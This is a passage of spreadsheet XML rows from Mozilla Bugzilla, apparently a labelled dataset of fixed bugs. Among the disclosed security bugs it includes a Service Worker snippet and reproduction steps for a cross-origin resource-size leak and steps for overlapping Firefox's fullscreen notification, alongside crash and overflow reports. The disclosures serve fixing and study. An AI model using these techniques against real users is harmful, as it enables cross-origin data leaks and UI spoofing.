See 
https://treeherder.mozilla.org/ui/logviewer.html#?job_id=772080&amp;repo=try
And
https://treeherder.mozilla.org/ui/logviewer.html#?job_id=160217&amp;repo=mozilla-central
for a similar case for warnings.</t>
        </is>
      </c>
      <c r="X4203" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4204">
      <c r="A4204" t="n">
        <v>938615</v>
      </c>
      <c r="B4204" t="inlineStr">
        <is>
          <t>2013-11-14 07:59:12 -0800</t>
        </is>
      </c>
      <c r="C4204" t="inlineStr">
        <is>
          <t>avoid GC hazard in ScriptSource::substring</t>
        </is>
      </c>
      <c r="D4204" t="inlineStr">
        <is>
          <t>2015-02-25 21:53:58 -0800</t>
        </is>
      </c>
      <c r="E4204" t="n">
        <v>1</v>
      </c>
      <c r="F4204" t="n">
        <v>1</v>
      </c>
      <c r="G4204" t="n">
        <v>3</v>
      </c>
      <c r="H4204" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4204" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4204" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K4204" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4204" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4204" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4204" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4204" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4204" t="inlineStr">
        <is>
          <t>[adv-main28+]</t>
        </is>
      </c>
      <c r="Q4204" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4204" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4204" t="inlineStr">
        <is>
          <t>mozilla28</t>
        </is>
      </c>
      <c r="T4204" t="n">
        <v>1</v>
      </c>
      <c r="U4204" t="n">
        <v>0</v>
      </c>
      <c r="V4204" t="n">
        <v>20</v>
      </c>
      <c r="W4204" t="inlineStr">
        <is>
          <t>Actually, I lied in bug 938390 comment 7; it looks like ScriptSource::substring doesn't AutoSupressGC and so a GC at js_NewStringCopyN&lt;CanGC&gt; could wipe out 'chars'.  I'll do what I was proposed in that bug.</t>
        </is>
      </c>
      <c r="X4204" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4205">
      <c r="A4205" t="n">
        <v>1497246</v>
      </c>
      <c r="B4205" t="inlineStr">
        <is>
          <t>2018-10-08 07:43:11 -0700</t>
        </is>
      </c>
      <c r="C4205" t="inlineStr">
        <is>
          <t>integer overflow in nsTArray::ReplaceElementsAt</t>
        </is>
      </c>
      <c r="D4205" t="inlineStr">
        <is>
          <t>2023-01-16 20:32:06 -0800</t>
        </is>
      </c>
      <c r="E4205" t="n">
        <v>1</v>
      </c>
      <c r="F4205" t="n">
        <v>1</v>
      </c>
      <c r="G4205" t="n">
        <v>3</v>
      </c>
      <c r="H4205" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4205" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4205" t="inlineStr">
        <is>
          <t>XPCOM</t>
        </is>
      </c>
      <c r="K4205" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4205" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4205" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4205" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4205" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4205" t="inlineStr">
        <is>
          <t>[adv-main102+][adv-esr91.11+]</t>
        </is>
      </c>
      <c r="Q4205" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4205" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4205" t="inlineStr">
        <is>
          <t>103 Branch</t>
        </is>
      </c>
      <c r="T4205" t="n">
        <v>1</v>
      </c>
      <c r="U4205" t="n">
        <v>0</v>
      </c>
      <c r="V4205" t="n">
        <v>12</v>
      </c>
      <c r="W4205" t="inlineStr">
        <is>
          <t>+++ This bug was initially created as a clone of Bug #1483699 +++
Bug 1483699 handled a few cases of potential integer overflow in AppendElements/InsertElementsAt.  There's one case in ReplaceElementsAt that we didn't handle and can handle in this bug:
  // Adjust memory allocation up-front to catch errors.
  if (!ActualAlloc::Successful(this-&gt;template EnsureCapacity&lt;ActualAlloc&gt;(
        Length() + aArrayLen - aCount, sizeof(elem_type)))) {
    return nullptr;
  }
The addition of Length() + aArrayLen - aCount should be checked for overflow in some fashion.</t>
        </is>
      </c>
      <c r="X4205" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4206">
      <c r="A4206" t="n">
        <v>1735923</v>
      </c>
      <c r="B4206" t="inlineStr">
        <is>
          <t>2021-10-14 16:02:50 -0700</t>
        </is>
      </c>
      <c r="C4206" t="inlineStr">
        <is>
          <t>Leaking size of cross-origin resources by using Range Requests and Service Workers</t>
        </is>
      </c>
      <c r="D4206" t="inlineStr">
        <is>
          <t>2024-07-22 23:13:06 -0700</t>
        </is>
      </c>
      <c r="E4206" t="n">
        <v>1</v>
      </c>
      <c r="F4206" t="n">
        <v>1</v>
      </c>
      <c r="G4206" t="n">
        <v>3</v>
      </c>
      <c r="H4206" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4206" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4206" t="inlineStr">
        <is>
          <t>Audio/Video: Playback</t>
        </is>
      </c>
      <c r="K4206" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4206" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4206" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4206" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4206" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4206" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?][adv-main101+][adv-esr91.10+], [wptsync upstream]</t>
        </is>
      </c>
      <c r="Q4206" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4206" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S4206" t="inlineStr">
        <is>
          <t>102 Branch</t>
        </is>
      </c>
      <c r="T4206" t="n">
        <v>1</v>
      </c>
      <c r="U4206" t="n">
        <v>0</v>
      </c>
      <c r="V4206" t="n">
        <v>47</v>
      </c>
      <c r="W4206" t="inlineStr">
        <is>
          <t>Created attachment 9246038
index.html
When a cross-origin resource is used in an audio/video tag, a request containing the Range header asking for "bytes=0-" is issued.
If the request is intercepted using a Service Worker and we respond with an arbitrary Content-Range header, e.g:
e.respondWith(new Response("A", {status: 206, headers: { "Content-Range": "bytes 0-1/5000", "Content-Type": "audio/mp4" }}));
Firefox will be tricked into thinking it got the first byte of the audio/video and then ask for the remaining bytes by issuing a new request containing the "Range: bytes=1-" header.
If we decide not to intercept the subsequent request, it will go directly to the server and ask for the remaining bytes, and the response will contain bytes ranging from 1 to the total bytes of the cross-origin response.
If the total number of bytes from the cross-origin response is smaller than the total amount we stipulated when we intercepted the initial ranged request, Firefox will be fooled into thinking it needs to request more bytes, and the target's server will throw a "416 Range Not Satisfiable" error response code as it is not able to fulfill the request (as it already sent all bytes for that particular request).
We can detect when this behavior happens by counting the number of resources in performance.getEntries(), allowing an attacker to leak the exact size of cross-origin resources that accept range requests.
In the PoC, the size of https://www.google.com/robots.txt is being brute-forced starting on byte 7260. In a real attack, it would be trying to get the size through binary search.
This vulnerability is useful for XS-Search attacks. A real-world example is https://medium.com/@luanherrera/xs-searching-googles-bug-tracker-to-find-out-vulnerable-source-code-50d8135b7549 (more on https://github.com/xsleaks/xsleaks/wiki/Real-World-Examples).
This is a variation of a bug I reported to Chrome a few years ago (https://bugs.chromium.org/p/chromium/issues/detail?id=990849).
Here's a video reproducing the issue:
https://youtu.be/pj2tvVRzglg
VERSION
Version: 93.0 (64-bit)
Operating System: Windows 10
REPRODUCTION CASE
1. Access https://lbherrera.github.io/lab/firefox/range-0553e1f/index.html
2. Click on the "check" button and after a moment you should see messages about the leaked size of the cross-origin resource.
I have also attached the files used in the PoC - if you prefer, you can reproduce the attack by downloading and hosting index.html and sw.js on a web server.
CREDIT INFORMATION
Reporter credit: Luan Herrera (@lbherrera_)</t>
        </is>
      </c>
      <c r="X4206" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4207">
      <c r="A4207" t="n">
        <v>693143</v>
      </c>
      <c r="B4207" t="inlineStr">
        <is>
          <t>2011-10-09 04:13:44 -0700</t>
        </is>
      </c>
      <c r="C4207" t="inlineStr">
        <is>
          <t>Crash in _cairo_dwrite_font_face_scaled_font_create</t>
        </is>
      </c>
      <c r="D4207" t="inlineStr">
        <is>
          <t>2012-02-23 17:30:30 -0800</t>
        </is>
      </c>
      <c r="E4207" t="n">
        <v>1</v>
      </c>
      <c r="F4207" t="n">
        <v>1</v>
      </c>
      <c r="G4207" t="n">
        <v>3</v>
      </c>
      <c r="H4207" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4207" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4207" t="inlineStr">
        <is>
          <t>Graphics</t>
        </is>
      </c>
      <c r="K4207" t="inlineStr">
        <is>
          <t>8 Branch</t>
        </is>
      </c>
      <c r="L4207" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4207" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N4207" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4207" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4207" t="inlineStr">
        <is>
          <t>[sg:critical][qa!]</t>
        </is>
      </c>
      <c r="Q4207" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4207" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4207" t="inlineStr">
        <is>
          <t>mozilla11</t>
        </is>
      </c>
      <c r="T4207" t="n">
        <v>1</v>
      </c>
      <c r="U4207" t="n">
        <v>0</v>
      </c>
      <c r="V4207" t="n">
        <v>52</v>
      </c>
      <c r="W4207" t="inlineStr">
        <is>
          <t>It's #35 top crasher in 8.0b1 while it is only #115 in 7.0.1 and #188 in 6.0.2.
There are two kinds of stack traces:
Frame 	Module 	Signature [Expand] 	Source
0 	xul.dll 	_cairo_dwrite_font_face_scaled_font_create 	gfx/cairo/cairo/src/cairo-dwrite-font.cpp:462
1 	xul.dll 	_moz_cairo_scaled_font_create 	gfx/cairo/cairo/src/cairo-scaled-font.c:1054
2 	xul.dll 	DCFromContext::DCFromContext 	gfx/thebes/gfxWindowsPlatform.h:79
3 	xul.dll 	HBGetGlyphAdvance 	gfx/thebes/gfxHarfBuzzShaper.cpp:266
4 	xul.dll 	hb_ot_shape_execute_internal 	gfx/harfbuzz/src/hb-ot-shape.cc:344
5 	xul.dll 	gfxHarfBuzzShaper::InitTextRun 	gfx/thebes/gfxHarfBuzzShaper.cpp:888
6 	xul.dll 	gfxGDIFont::InitTextRun 	gfx/thebes/gfxGDIFont.cpp:166
7 	xul.dll 	gfxFont::SplitAndInitTextRun 	gfx/thebes/gfxFont.cpp:1513
8 	xul.dll 	gfxFontGroup::InitScriptRun 	gfx/thebes/gfxFont.cpp:2524
9 	xul.dll 	gfxFontGroup::InitTextRun 	gfx/thebes/gfxFont.cpp:2484
10 	xul.dll 	gfxFontGroup::MakeTextRun 	gfx/thebes/gfxFont.cpp:2418
11 	xul.dll 	TextRunWordCache::MakeTextRun 	gfx/thebes/gfxTextRunWordCache.cpp:850
Frame 	Module 	Signature [Expand] 	Source
0 	xul.dll 	_cairo_dwrite_font_face_scaled_font_create 	gfx/cairo/cairo/src/cairo-dwrite-font.cpp:462
1 	xul.dll 	_moz_cairo_scaled_font_create 	gfx/cairo/cairo/src/cairo-scaled-font.c:1054
2 	xul.dll 	_cairo_gstate_ensure_scaled_font 	gfx/cairo/cairo/src/cairo-gstate.c:1811
3 	xul.dll 	GetRoundOffsetsToPixels 	gfx/thebes/gfxHarfBuzzShaper.cpp:932
4 	xul.dll 	gfxHarfBuzzShaper::SetGlyphsFromRun 	gfx/thebes/gfxHarfBuzzShaper.cpp:1020
5 	xul.dll 	gfxHarfBuzzShaper::InitTextRun 	gfx/thebes/gfxHarfBuzzShaper.cpp:897
6 	xul.dll 	gfxGDIFont::InitTextRun 	gfx/thebes/gfxGDIFont.cpp:166
7 	xul.dll 	gfxFont::SplitAndInitTextRun 	gfx/thebes/gfxFont.cpp:1513
8 	xul.dll 	gfxFontGroup::InitScriptRun 	gfx/thebes/gfxFont.cpp:2524
9 	xul.dll 	gfxFontGroup::InitTextRun 	gfx/thebes/gfxFont.cpp:2484
10 	xul.dll 	gfxFontGroup::MakeTextRun 	gfx/thebes/gfxFont.cpp:2436
11 	xul.dll 	TextRunWordCache::MakeTextRun 	gfx/thebes/gfxTextRunWordCache.cpp:717
12 	xul.dll 	MakeTextRun 	layout/generic/nsTextFrameThebes.cpp:551
...
More reports at:
https://crash-stats.mozilla.com/report/list?signature=_cairo_dwrite_font_face_scaled_font_create&amp;version=Firefox%3A8.0</t>
        </is>
      </c>
      <c r="X4207" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4208">
      <c r="A4208" t="n">
        <v>668245</v>
      </c>
      <c r="B4208" t="inlineStr">
        <is>
          <t>2011-06-29 10:01:17 -0700</t>
        </is>
      </c>
      <c r="C4208" t="inlineStr">
        <is>
          <t>Crash [@ mozilla::places::History::NotifyVisited(nsIURI*) ]</t>
        </is>
      </c>
      <c r="D4208" t="inlineStr">
        <is>
          <t>2013-12-27 14:27:07 -0800</t>
        </is>
      </c>
      <c r="E4208" t="n">
        <v>1</v>
      </c>
      <c r="F4208" t="n">
        <v>1</v>
      </c>
      <c r="G4208" t="n">
        <v>3</v>
      </c>
      <c r="H4208" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4208" t="inlineStr">
        <is>
          <t>Toolkit</t>
        </is>
      </c>
      <c r="J4208" t="inlineStr">
        <is>
          <t>Places</t>
        </is>
      </c>
      <c r="K4208" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4208" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4208" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4208" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4208" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4208" t="inlineStr">
        <is>
          <t>[sg:critical?][qa!]</t>
        </is>
      </c>
      <c r="Q4208" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4208" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4208" t="inlineStr">
        <is>
          <t>mozilla8</t>
        </is>
      </c>
      <c r="T4208" t="n">
        <v>1</v>
      </c>
      <c r="U4208" t="n">
        <v>0</v>
      </c>
      <c r="V4208" t="n">
        <v>48</v>
      </c>
      <c r="W4208" t="inlineStr">
        <is>
          <t>Created attachment 542851
crash report 1
1. http://bella.heavenforum.org/t1220-koreana-film-mesum-bali
2. Opens multitudes of external programs for various protocols for example mail instances (Outlook on the Crash Automation) as well as IRC if you have that set up. 
3. Crash Aurora
Original Socorro report bp-6165cea3-0d6e-4841-ba25-f33692110626
0 	xul.dll 	mozilla::places::History::NotifyVisited 	
1 	xul.dll 	mozilla::places::`anonymous namespace'::NotifyVisitObservers::Run 	toolkit/components/places/History.cpp:477
2 	xul.dll 	nsThread::ProcessNextEvent 	xpcom/threads/nsThread.cpp:618
3 	nspr4.dll 	PR_GetThreadPrivate 	nsprpub/pr/src/threads/prtpd.c:232
4 	xul.dll 	NS_ProcessNextEvent_P 	obj-firefox/xpcom/build/nsThreadUtils.cpp:250
5 	xul.dll 	nsXULWindow::ShowModal 	xpfe/appshell/src/nsXULWindow.cpp:419
6 	xul.dll 	nsContentTreeOwner::ShowAsModal 	xpfe/appshell/src/nsContentTreeOwner.cpp:554
7 	xul.dll 	nsWindowWatcher::OpenWindowJSInternal 	
Other reports on Windows Firefox 4 and 5:
https://crash-stats.mozilla.com/report/list?product=Firefox&amp;query_search=signature&amp;query_type=contains&amp;query=mozilla%3A%3Aplaces%3A%3AHistory%3A%3ANotifyVisited&amp;reason_type=contains&amp;date=06%2F29%2F2011%2009%3A47%3A44&amp;range_value=1&amp;range_unit=weeks&amp;hang_type=any&amp;process_type=any&amp;do_query=1&amp;signature=mozilla%3A%3Aplaces%3A%3AHistory%3A%3ANotifyVisited%28nsIURI%2A%29
crash report 1 
Operating system: Windows NT
                  5.1.2600 Service Pack 3
CPU: x86
     GenuineIntel family 6 model 44 stepping 2
     1 CPU
Crash reason:  EXCEPTION_ACCESS_VIOLATION_READ
Crash address: 0x11
Thread 0 (crashed)
 0  xul.dll!nsTArray_base&lt;nsTArrayDefaultAllocator&gt;::Length() [nsTArray.h : 139 + 0x5]
    eip = 0x10061b1c   esp = 0x00119d00   ebp = 0x00119d04   ebx = 0x00000000
    esi = 0x12411750   edi = 0xffff0007   eax = 0x04442848   ecx = 0x00000011
    edx = 0x00000001   efl = 0x00010206
    Found by: given as instruction pointer in context
 1  xul.dll!mozilla::places::History::NotifyVisited(nsIURI *) [History.cpp : 1304 + 0x7]
    eip = 0x1106b584   esp = 0x00119d0c   ebp = 0x00119d2c
    Found by: call frame info</t>
        </is>
      </c>
      <c r="X4208" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4209">
      <c r="A4209" t="n">
        <v>813442</v>
      </c>
      <c r="B4209" t="inlineStr">
        <is>
          <t>2012-11-19 22:23:13 -0800</t>
        </is>
      </c>
      <c r="C4209" t="inlineStr">
        <is>
          <t>Crash opening/closing a &lt;select&gt; while entering/leaving fullscreen mode</t>
        </is>
      </c>
      <c r="D4209" t="inlineStr">
        <is>
          <t>2014-12-13 22:33:24 -0800</t>
        </is>
      </c>
      <c r="E4209" t="n">
        <v>1</v>
      </c>
      <c r="F4209" t="n">
        <v>1</v>
      </c>
      <c r="G4209" t="n">
        <v>3</v>
      </c>
      <c r="H4209" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4209" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4209" t="inlineStr">
        <is>
          <t>Layout</t>
        </is>
      </c>
      <c r="K4209" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4209" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4209" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4209" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4209" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4209" t="inlineStr">
        <is>
          <t>also fixes topcrash 682208 [adv-main20+][adv-esr1705+]</t>
        </is>
      </c>
      <c r="Q4209" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4209" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4209" t="inlineStr">
        <is>
          <t>mozilla21</t>
        </is>
      </c>
      <c r="T4209" t="n">
        <v>1</v>
      </c>
      <c r="U4209" t="n">
        <v>0</v>
      </c>
      <c r="V4209" t="n">
        <v>36</v>
      </c>
      <c r="W4209" t="inlineStr">
        <is>
          <t>Created attachment 683455
testcase (requires prefs, focus, and holding Alt+Down)
1. Create a profile directory with the following prefs.js file:
  user_pref("browser.fullscreen.autohide", false);
  user_pref("browser.tabs.autoHide", true);
  user_pref("full-screen-api.allow-trusted-requests-only", false);
2. Run Firefox like this:
  firefox -foreground -profile ~/px/b/ r.html
3. Verify that r.html is the only open tab, and it is entering and exiting full-screen mode on its own.
4. Hold &lt;Alt+Down&gt; until it crashes.
Result: Crash, usually within 15 seconds.</t>
        </is>
      </c>
      <c r="X4209" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4210">
      <c r="A4210" t="n">
        <v>996863</v>
      </c>
      <c r="B4210" t="inlineStr">
        <is>
          <t>2014-04-15 15:16:03 -0700</t>
        </is>
      </c>
      <c r="C4210" t="inlineStr">
        <is>
          <t>[B2G][Tarako][Dialer][Airplane Mode] Large lag occurs when making an emergency call with airplane mode activated</t>
        </is>
      </c>
      <c r="D4210" t="inlineStr">
        <is>
          <t>2014-07-18 12:22:00 -0700</t>
        </is>
      </c>
      <c r="E4210" t="n">
        <v>1</v>
      </c>
      <c r="F4210" t="n">
        <v>1</v>
      </c>
      <c r="G4210" t="n">
        <v>6</v>
      </c>
      <c r="H4210" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I4210" t="inlineStr">
        <is>
          <t>Firefox OS Graveyard</t>
        </is>
      </c>
      <c r="J4210" t="inlineStr">
        <is>
          <t>Vendcom</t>
        </is>
      </c>
      <c r="K4210" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4210" t="inlineStr">
        <is>
          <t>ARM</t>
        </is>
      </c>
      <c r="M4210" t="inlineStr">
        <is>
          <t>Gonk (Firefox OS)</t>
        </is>
      </c>
      <c r="N4210" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4210" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4210" t="inlineStr">
        <is>
          <t>1.3tarakorun2 [c=progress p= s= u=tarako]</t>
        </is>
      </c>
      <c r="Q4210" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4210" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S4210" t="inlineStr">
        <is>
          <t>2.0 S6 (18july)</t>
        </is>
      </c>
      <c r="T4210" t="n">
        <v>1</v>
      </c>
      <c r="U4210" t="n">
        <v>0</v>
      </c>
      <c r="V4210" t="n">
        <v>69</v>
      </c>
      <c r="W4210" t="inlineStr">
        <is>
          <t>Created attachment 8407145
Video.ogg
Description:
A large lag (~10 seconds) is experienced when the user tries to dial 112 (state patrol) while airplane mode is activated. The dialer screen appears to freeze up, even if the user tries to tap the dial button repeatedly.
Repro Steps:
1) Update a Tarako to BuildID: 20140415004002
2) Pull down notifications bar and activate airplane mode
3) Tap home and enter dialer 
4) Dial 112 and tap the call button
5) Observe the phone sit on the dialer screen for an extended amount of time (~10 seconds) before finally connecting the emergency phone call
Actual:
Large lag is experienced between making an emergency call in airplane mode and the call actually connecting.
Expected:
Call goes through in a timely fashion (especially in state of emergency).
v1.4 Environmental Variables:
Device: Tarako v1.4 MOZ ril
BuildID: 20140415004002
Gaia: 44ff6248c28ff83b9ad1161847a176399f93d3bb
Gecko: 28aea220e338
Version: 28.1
Firmware Version: sp8810
Repro frequency: 2/2
Attachments: Video</t>
        </is>
      </c>
      <c r="X4210" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4211">
      <c r="A4211" t="n">
        <v>1798219</v>
      </c>
      <c r="B4211" t="inlineStr">
        <is>
          <t>2022-10-30 12:16:36 -0700</t>
        </is>
      </c>
      <c r="C4211" t="inlineStr">
        <is>
          <t>Run requestFullscreen and reuse window.open simultaneously in blocking event loop able to overlap fullscreen notification</t>
        </is>
      </c>
      <c r="D4211" t="inlineStr">
        <is>
          <t>2024-05-30 11:01:57 -0700</t>
        </is>
      </c>
      <c r="E4211" t="n">
        <v>1</v>
      </c>
      <c r="F4211" t="n">
        <v>1</v>
      </c>
      <c r="G4211" t="n">
        <v>3</v>
      </c>
      <c r="H4211" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4211" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4211" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K4211" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4211" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4211" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4211" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4211" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4211" t="inlineStr">
        <is>
          <t>[fixed in bug 1814597][reporter-external] [client-bounty-form] [verif?][post-critsmash-triage][adv-main112+][adv-esr102.10+]</t>
        </is>
      </c>
      <c r="Q4211" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R4211" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S4211" t="inlineStr">
        <is>
          <t>113 Branch</t>
        </is>
      </c>
      <c r="T4211" t="n">
        <v>1</v>
      </c>
      <c r="U4211" t="n">
        <v>0</v>
      </c>
      <c r="V4211" t="n">
        <v>8</v>
      </c>
      <c r="W4211" t="inlineStr">
        <is>
          <t>Created attachment 9300989
quicktestcase.html
While the event loop is busy then click button to run `requestFullScreen` and click button to re-launch `window.open` with same `windowName` to gain focus, then once the JS event loop is no longer busy, both function will be executed simultaneously, interestingly the focused popup window able to overlap fullscreen notification toast.
For now I'm attaching a quick testcase to demonstrate it can overlap with fullscreen notifications tested working on Linux (X11 and Wayland).
## Tested on:
- Firefox Nightly 108.0a1 (2022-10-30) (64-bit) on Arch Linux (X11 and Wayland)
- Firefox Nightly 108.0a1 (2022-10-30) (64-bit) on Ubuntu 22.04.1 LTS (X11 and Wayland)
- Firefox 106.0.1 (64-bit) on Arch Linux (X11 and Wayland)
- Firefox 102.4.0esr (64-bit) on Arch Linux (X11 and Wayland)
## Steps to reproduce:
1. Open Firefox on Linux (X11 or Wayland)
2. Visit attached quicktestcase.html
3. Click "Launch Main Window"
4. (On new main popup window) 
5. Click "Launch Spoof Window"
6. Minimize the spoof window
7. Click "Block Event Loop"
8. (While the button and page is freeze)
9. Click "requestFullscreen"
10. Click "reFocus"
11. After a few seconds focused popup window will overlap fullscreen notification toast</t>
        </is>
      </c>
      <c r="X4211" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4212">
      <c r="A4212" t="n">
        <v>283989</v>
      </c>
      <c r="B4212" t="inlineStr">
        <is>
          <t>2005-02-27 13:42:11 -0800</t>
        </is>
      </c>
      <c r="C4212" t="inlineStr">
        <is>
          <t>CGI.pl global init code should be moved to Bugzilla::CGI</t>
        </is>
      </c>
      <c r="D4212" t="inlineStr">
        <is>
          <t>2006-02-12 17:37:58 -0800</t>
        </is>
      </c>
      <c r="E4212" t="n">
        <v>1</v>
      </c>
      <c r="F4212" t="n">
        <v>1</v>
      </c>
      <c r="G4212" t="n">
        <v>4</v>
      </c>
      <c r="H4212" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I4212" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J4212" t="inlineStr">
        <is>
          <t>Bugzilla-General</t>
        </is>
      </c>
      <c r="K4212" t="inlineStr">
        <is>
          <t>2.19.2</t>
        </is>
      </c>
      <c r="L4212" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4212" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4212" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4212" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4212" t="inlineStr"/>
      <c r="Q4212" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R4212" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4212" t="inlineStr">
        <is>
          <t>Bugzilla 2.22</t>
        </is>
      </c>
      <c r="T4212" t="n">
        <v>1</v>
      </c>
      <c r="U4212" t="n">
        <v>0</v>
      </c>
      <c r="V4212" t="n">
        <v>17</v>
      </c>
      <c r="W4212" t="inlineStr">
        <is>
          <t>Right now CGI.pl does a few things at the top, like correctly set the TEMP
environment variable for Win32, and check if shutdownhtml is turned on.
If we remove CGI.pl from those scripts (as we have from a few), then those
things won't happen.
Instead, those things should happen during Bugzilla::CGI::new.</t>
        </is>
      </c>
      <c r="X4212" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4213">
      <c r="A4213" t="n">
        <v>754725</v>
      </c>
      <c r="B4213" t="inlineStr">
        <is>
          <t>2012-05-13 15:44:54 -0700</t>
        </is>
      </c>
      <c r="C4213" t="inlineStr">
        <is>
          <t>Assertion failure: (ptrBits &amp; 0x7) == 0, at jsval.h:760 or Crash [@ compartment]</t>
        </is>
      </c>
      <c r="D4213" t="inlineStr">
        <is>
          <t>2013-03-11 07:22:35 -0700</t>
        </is>
      </c>
      <c r="E4213" t="n">
        <v>1</v>
      </c>
      <c r="F4213" t="n">
        <v>1</v>
      </c>
      <c r="G4213" t="n">
        <v>3</v>
      </c>
      <c r="H4213" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4213" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
